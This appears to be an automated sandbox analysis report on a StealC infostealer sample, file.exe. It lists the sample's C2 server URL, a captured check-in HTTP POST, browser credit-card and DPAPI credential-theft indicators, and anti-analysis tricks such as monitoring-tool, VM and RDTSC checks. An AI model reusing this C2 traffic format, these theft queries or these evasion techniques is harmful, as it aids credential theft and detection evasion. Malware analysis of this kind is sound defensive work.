Source: Yara match	File source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted Domains

Name	IP	Active
198.187.3.20.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/ws	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.5c0000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_005CC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_005C7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_005C9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_005C9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_005D8EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005D38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005D4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005CE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005D4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005CED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005C16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005D3EA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAEGHDGDBGDGDAAFIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 33 34 39 31 34 36 41 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 45 47 48 44 47 44 42 47 44 47 44 41 41 46 49 2d 2d 0d 0a Data Ascii: ------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="hwid"D9D349146A8B2768236643------AFHDAEGHDGDBGDGDAAFIContent-Disposition: form-data; name="build"doma------AFHDAEGHDGDBGDGDAAFI--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Source: unknown

DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005C4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_005C4880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpuL
Source: file.exe, 00000000.00000002.2215149403.00000000014E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37L

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027	0_2_0090F027
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5	0_2_0098E1D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00996969	0_2_00996969
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009932C9	0_2_009932C9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A13A09	0_2_00A13A09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00908BEA	0_2_00908BEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098AC3B	0_2_0098AC3B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008BC434	0_2_008BC434
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FDC30	0_2_008FDC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098FC59	0_2_0098FC59
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099847F	0_2_0099847F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00994DBC	0_2_00994DBC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F8DF4	0_2_008F8DF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C1EA6	0_2_008C1EA6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0096DE1D	0_2_0096DE1D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098C74C	0_2_0098C74C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099177F	0_2_0099177F

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 005C45C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: yhphlozs ZLIB complexity 0.9949685097603256

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005D9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_005D3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EHI8I06B.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsr?;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1854976 > 1048576

Source: file.exe

Static PE information: Raw size of yhphlozs is bigger than: 0x100000 < 0x19ea00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.5c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yhphlozs:EW;rdjojuwm:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_005D9860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1cdfff should be: 0x1d161e

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: yhphlozs
Source: file.exe	Static PE information: section name: rdjojuwm
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009CC0CE push edx; mov dword ptr [esp], esp	0_2_009CC10B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A138F2 push 71AE9534h; mov dword ptr [esp], ecx	0_2_00A1391A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005DB035 push ecx; ret	0_2_005DB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A758CE push 680F0635h; mov dword ptr [esp], esp	0_2_00A758D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A758CE push 5B8C78D7h; mov dword ptr [esp], eax	0_2_00A75FD2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push edi; mov dword ptr [esp], ebx	0_2_0090F0B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push ebp; mov dword ptr [esp], 5FDFE3EEh	0_2_0090F174
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 69B550A1h; mov dword ptr [esp], ebx	0_2_0090F1A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 1350B330h; mov dword ptr [esp], edx	0_2_0090F26E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 514680F2h; mov dword ptr [esp], eax	0_2_0090F2A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090F027 push 395FF5D2h; mov dword ptr [esp], edx	0_2_0090F2B6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009D4840 push ebx; mov dword ptr [esp], 123D5D00h	0_2_009D484C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BE07D push 4E27B35Bh; mov dword ptr [esp], eax	0_2_009BE092
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BE07D push ebp; mov dword ptr [esp], edx	0_2_009BE0E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A33852 push edi; mov dword ptr [esp], 02C24316h	0_2_00A33856
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A33852 push eax; mov dword ptr [esp], edx	0_2_00A33981
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push ecx; mov dword ptr [esp], eax	0_2_008C723B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push esi; mov dword ptr [esp], 64AEEE82h	0_2_008C727F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push ecx; mov dword ptr [esp], edx	0_2_008C7310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008C718F push ebx; mov dword ptr [esp], ebp	0_2_008C7314
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2C98D push 6AC2D9FCh; mov dword ptr [esp], ebx	0_2_00A2C9B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A2C98D push 5FD3D891h; mov dword ptr [esp], ecx	0_2_00A2C9BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A069EC push esi; mov dword ptr [esp], ecx	0_2_00A06A56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push edx; mov dword ptr [esp], ecx	0_2_0098E1DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push esi; mov dword ptr [esp], ecx	0_2_0098E214
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push eax; mov dword ptr [esp], 4C97D83Ah	0_2_0098E23E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push ebx; mov dword ptr [esp], 17851D7Dh	0_2_0098E2CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push 1DCB9CECh; mov dword ptr [esp], esi	0_2_0098E316
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push ecx; mov dword ptr [esp], ebp	0_2_0098E391
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push eax; mov dword ptr [esp], edi	0_2_0098E3B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098E1D5 push 172EDC16h; mov dword ptr [esp], ecx	0_2_0098E402

Source: file.exe

Static PE information: section name: yhphlozs entropy: 7.95378057749378

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_005D9860

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C546 second address: 99C55E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7F147AEA4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C7FE second address: 99C804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C804 second address: 99C809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CAFB second address: 99CB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CB01 second address: 99CB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CB05 second address: 99CB3B instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F7F1511CE2Ah 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 jp 00007F7F1511CE26h 0x0000001f jmp 00007F7F1511CE36h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0713 second address: 9A0719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0719 second address: 9A071E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A071E second address: 9A0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 647CAD3Fh 0x0000000e sub cx, 0E59h 0x00000013 push 00000003h 0x00000015 mov ch, bl 0x00000017 push 00000000h 0x00000019 jmp 00007F7F147AEA4Eh 0x0000001e or dword ptr [ebp+122D35E9h], edi 0x00000024 push 00000003h 0x00000026 jmp 00007F7F147AEA4Dh 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D2B54h], edx 0x00000032 push eax 0x00000033 mov dword ptr [ebp+122D28EFh], ebx 0x00000039 pop ebx 0x0000003a popad 0x0000003b push 722811A0h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0775 second address: 9A0779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0779 second address: 9A077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A077F second address: 9A07CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 4DD7EE60h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F1511CE28h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b add dword ptr [ebp+122D1B1Fh], edx 0x00000031 lea ebx, dword ptr [ebp+124525D2h] 0x00000037 or di, 9750h 0x0000003c push eax 0x0000003d pushad 0x0000003e jc 00007F7F1511CE2Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0911 second address: 9A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0915 second address: 9A0976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F7F1511CE34h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jg 00007F7F1511CE30h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 jmp 00007F7F1511CE39h 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0976 second address: 9A097B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A097B second address: 9A0993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 movzx edx, si 0x0000000b lea ebx, dword ptr [ebp+124525DBh] 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0993 second address: 9A0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0999 second address: 9A099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A09FD second address: 9A0A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F147AEA57h 0x0000000f nop 0x00000010 cld 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F7F147AEA48h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jp 00007F7F147AEA49h 0x00000033 push D75099D8h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7F147AEA4Bh 0x0000003f rdtsc
